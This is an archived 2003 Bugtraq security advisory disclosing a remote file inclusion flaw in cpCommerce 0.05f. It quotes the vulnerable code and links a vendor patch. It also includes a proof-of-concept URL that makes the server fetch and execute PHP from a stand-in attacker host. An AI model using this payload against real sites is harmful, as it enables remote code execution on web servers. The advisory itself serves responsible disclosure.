lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20031019120757.5aed2334.secfoc@email.it>
Date: Sun, 19 Oct 2003 12:07:57 +0200
From: Astharot <secfoc@...il.it>
To: bugtraq@...urityfocus.com
Subject: ZH2003-31SA (security advisory): file inclusion vulnerability in
 cpCommerce


ZH2003-31SA (security advisory): file inclusion vulnerability in cpCommerce

Published: 19 October 2003
Name: cpCommerce Affected Versions: 0.05f (and other versions?)
Vendor: http://www.cpcommerce.org
Issue: file inclusion vulnerability
Author: Astharot (at Zone-H.org)

Description
**********
Zone-H Security Team has discovered a flaw in cpCommerce. cpCommerce "is an
open-source e-commerce solution that is entirely template and module based.".

Details
**********
There's a file inclusion vulnerability in the _functions.php file, line 13-14:

  require_once("{$prefix}_config.php");
  require_once("{$prefix}_gateways.php");

Is it possible for a remote attacker to include an external file and execute
arbitrary commands with the privileges of the webserver (nobody by default).

To test the vulnerability try this:

http://www.vulnsite.com/path_of_cpcommerce/_functions.php?prefix=http://www.attacker.com/index

In this way the file "http://www.attacker.com/index_config.php" or
"http://www.attacker.com/index_gateways.php" will be included and executed on
the server.

Solution
**********
The author has been contacted and he published a temporary fix in the cpCommerce
website forum, waiting for the new version.

The patch is avaible here:
http://cpcommerce.org/forums/index.php?board=2;action=display;threadid=864.

Suggestions
**********
Fix the script with the patch proposed by the author.

Link to ariginal article here:
 
http://www.zone-h.org/en/advisories/read/id=3284/ 


Astharot - Zone-H Admin
-- 
http://www.zone-h.org - astharot@...e-h.org
PGP Key: http://www.gife.org/astharot.asc

Linux User #292132


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ